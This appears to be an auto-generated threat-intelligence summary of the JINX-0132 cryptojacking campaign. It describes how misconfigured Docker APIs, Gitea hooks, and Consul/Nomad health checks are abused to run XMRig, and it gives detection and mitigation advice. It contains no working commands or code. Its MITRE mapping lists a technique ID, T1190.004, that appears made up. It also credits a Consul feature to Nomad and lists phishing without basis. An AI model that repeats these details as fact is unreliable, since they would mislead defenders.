Full Report
Cybersecurity researchers have discovered a new cryptojacking campaign that's targeting publicly accessible DevOps web servers such as those associated with Docker, Gitea, and HashiCorp Consul and Nomad to illicitly mine cryptocurrencies. Cloud security firm Wiz, which is tracking the activity under the name JINX-0132, said the attackers are exploiting a wide range of known misconfigurations and
Analysis Summary
# Tool/Technique: JINX-0132 Cryptojacking Campaign
## Overview
JINX-0132 is a cryptojacking campaign discovered by Wiz that targets publicly accessible DevOps web servers (such as those related to Docker, Gitea, and HashiCorp Consul/Nomad) to illicitly mine cryptocurrencies. A distinguishing feature of this campaign is the reliance on downloading necessary tools directly from public GitHub repositories, rather than using attacker-controlled infrastructure, likely to obscure attribution. Critically, this campaign represents the first publicly documented instance of HashiCorp Nomad misconfigurations being exploited in the wild as an attack vector.
## Technical Details
- Type: Malware Campaign / Exploitation Chain
- Platform: Linux/Containerized Environments (targeting Docker, Gitea, HashiCorp services)
- Capabilities: Initial compromise via misconfigurations/vulnerabilities, remote code execution (RCE), payload delivery (cryptominer), sustained cryptomining operations.
- First Seen: Tracking observed around late May/early June 2025.
## MITRE ATT&CK Mapping
This campaign utilizes multiple techniques across the initial access, execution, and persistence tactics:
- [T1190 - Exploit Public-Facing Application]
- [T1190.004 - Exploit Public-Facing Application: Exploit Gitea Vulnerability]
- [T1059 - Command and Scripting Interpreter] (Used heavily via Consul health checks and Docker API execution)
- [T1059.004 - Command and Scripting Interpreter: Unix Shell]
- [T1021 - Remote Services] (Via exposed APIs/services)
- [T1566 - Phishing] (Not explicitly detailed, but context implies reliance on exposed services/misconfigurations for initial access)
- *Note: Initial access seems driven by scanning exposed services rather than traditional phishing.*
## Functionality
### Core Capabilities
- **Targeting DevOps Infrastructure:** Focuses specifically on exploiting misconfigurations or vulnerabilities in popular DevOps tools: Docker, Gitea, HashiCorp Consul, and HashiCorp Nomad.
- **Payload Delivery:** Downloads and executes the XMRig cryptomining payload directly from GitHub repositories.
- **Resource Hijacking:** Aims to compromise Nomad instances managing hundreds of clients to leverage significant combined CPU and RAM resources for mining.
### Advanced Features
- **Abuse of HashiCorp Nomad:** Exploiting the `register service` and `define health checks` capability in improperly configured Nomad systems. Attackers register malicious services whose health checks execute a bash command to download and run the miner.
- **Gitea RCE Vector:** Exploiting Gitea versions (e.g., 1.4.0) where an attacker with user access to create git hooks, or where the `INSTALL_LOCK` setting is disabled, can achieve RCE.
- **Docker API Abuse:** Leveraging endpoints like `/containers/create` and `/containers/{id}/start` to spin up containers that mount the host filesystem or run mining images.
- **Attribution Avoidance:** Using off-the-shelf tools sourced directly from GitHub instead of attacker-controlled infrastructure.
## Indicators of Compromise
*Indicators are derived from the documented exploitation vectors, not specific IOCs mentioned in the text.*
- File Hashes: [Not explicitly listed in the article summary]
- File Names: [Cryptominer payload name likely includes artifacts related to **XMRig**]
- Registry Keys: [Not applicable/Not listed]
- Network Indicators: [C2 infrastructure is likely abstracted by using GitHub for downloads, but outbound traffic to mining pools is expected]
- Behavioral Indicators:
- Attempts to create or modify service definitions within HashiCorp Nomad configurations to execute arbitrary commands upon health checks.
- Docker API calls (`/containers/create`, `/containers/{id}/start`) executed by external or unauthorized processes.
- Execution of shell commands attempting to download binaries from `github.com` repositories onto target servers.
## Associated Threat Actors
- **JINX-0132 Group** (Name assigned by Wiz for tracking this specific campaign).
## Detection Methods
- [Signature-based detection: Signature needed for the specific XMRig payloads distributed.]
- [Behavioral detection: Monitoring for legitimate DevOps APIs (Docker, Nomad) being used outside of expected administrative workflows to launch shell processes or container creation.]
- [YARA rules if available: No explicit YARA rules provided in the summary.]
- **Specific Service Configuration Checks:** Auditing Nomad configurations for services registered by unauthorized users that include bash commands in health checks.
## Mitigation Strategies
- **API Security & Network Segmentation:** Restrict access to public-facing DevOps APIs (Docker API, Gitea/Git hooks, Consul HTTP API) only to necessary internal IP ranges or identity-aware proxies.
- **Patching and Configuration Hardening:**
- Ensure Gitea installations have `INSTALL_LOCK=true` and apply necessary patches (mitigates CVE-2020-14144 vector).
- Properly configure HashiCorp Consul to restrict remote users from registering services and defining arbitrary health checks.
- Secure Docker API access or use secure alternatives (e.g., Docker Contexts, TLS).
- **Principle of Least Privilege:** Ensure any user accounts used for Gitea or other Git services do not possess permissions to create hooks or modify configurations that lead to RCE.
## Related Tools/Techniques
- **XMRig:** The specific cryptomining software observed being deployed.
- **Container Escape/Abuse Techniques:** Related to the exploitation of misconfigured Docker APIs.
- **Previous Docker API Cryptojacking Campaigns:** Such as the activity previously publicized by Kaspersky targeting misconfigured Docker instances.